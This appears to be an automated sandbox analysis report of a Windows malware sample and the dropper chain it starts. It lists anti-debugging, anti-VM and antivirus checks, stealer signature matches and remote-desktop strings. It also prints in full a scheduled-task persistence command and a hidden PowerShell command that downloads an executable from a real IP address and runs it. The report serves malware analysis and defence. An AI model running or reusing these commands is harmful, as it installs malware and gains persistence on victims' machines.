                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 180000
                  Source: rapes.exe, rapes.exe, 00000016.00000002.2113049150.00000000010FF000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: mshta.exe, 00000007.00000002.916613046.0000022B7785B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: svchost.exe, 0000000F.00000002.2114310656.000002DD9B827000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2114355611.000002DD9B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2116411383.000002DDA0E57000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000016.00000002.2111635363.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000016.00000002.2111635363.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: mshta.exe, 00000002.00000003.866961899.0000000002961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\)
                  Source: powershell.exe, 00000005.00000002.906202560.0000000002A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5`
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.958911636.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\ 3
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.957796732.000000000037F000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000B.00000002.984479066.00000000010FF000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000C.00000002.990047516.00000000010FF000.00000040.00000001.01000000.0000000F.sdmp, TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000002.1002692939.000000000037F000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 00000016.00000002.2113049150.00000000010FF000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
                  Source: powershell.exe, 00000005.00000002.917585658.0000000006D7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 00000008.00000002.1004489959.0000020058E6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:!
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESystem information queried: ModuleInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEThread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEThread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXECode function: 10_2_04BB03F9 Start: 04BB04B1 End: 04BB040810_2_04BB03F9
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_04F802C3 Start: 04F803FF End: 04F8034E22_2_04F802C3
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SIWVID
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXECode function: 10_2_04BB0AA0 rdtsc 10_2_04BB0AA0
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B1EAA2 BlockInput,0_2_00B1EAA2
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC4CE8 mov eax, dword ptr fs:[00000030h]0_2_00AC4CE8
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F25FF2 mov eax, dword ptr fs:[00000030h]22_2_00F25FF2
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F1DB60 mov eax, dword ptr fs:[00000030h]22_2_00F1DB60
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC083F
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC09D5 SetUnhandledExceptionFilter,0_2_00AC09D5
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AC0C21

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: amsi32_6892.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_512.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6892, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5284, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 512, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B01201
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AE2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AE2BA5
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0B226 SendInput,keybd_event,0_2_00B0B226
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00B222DA
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE"
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B01663
                  Source: uw7A6EF76R.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: uw7A6EF76R.exeBinary or memory string: Shell_TrayWnd
                  Source: rapes.exe, rapes.exe, 00000016.00000002.2113049150.00000000010FF000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: $x.Program Manager
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.957796732.000000000037F000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000B.00000002.984479066.00000000010FF000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000C.00000002.990047516.00000000010FF000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: o $x.Program Manager
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC0698 cpuid 0_2_00AC0698
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AFD21C GetLocalTime,0_2_00AFD21C
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AFD27A GetUserNameW,0_2_00AFD27A
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.984343955.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.944161956.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.989946070.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000003.1491050871.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1002520694.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.957624857.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.961859847.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2112729465.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.917256725.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: uw7A6EF76R.exe | Binary or memory string: WIN_81
Source: uw7A6EF76R.exe | Binary or memory string: WIN_XP
Source: uw7A6EF76R.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: uw7A6EF76R.exe | Binary or memory string: WIN_XPe
Source: uw7A6EF76R.exe | Binary or memory string: WIN_VISTA
Source: uw7A6EF76R.exe | Binary or memory string: WIN_7
Source: uw7A6EF76R.exe | Binary or memory string: WIN_8

                  Remote Access Functionality

Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | String found in binary or memory: net start termservice
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.957624857.0000000000171000.00000040.00000001.01000000.0000000B.sdmp | String found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.957624857.0000000000171000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ 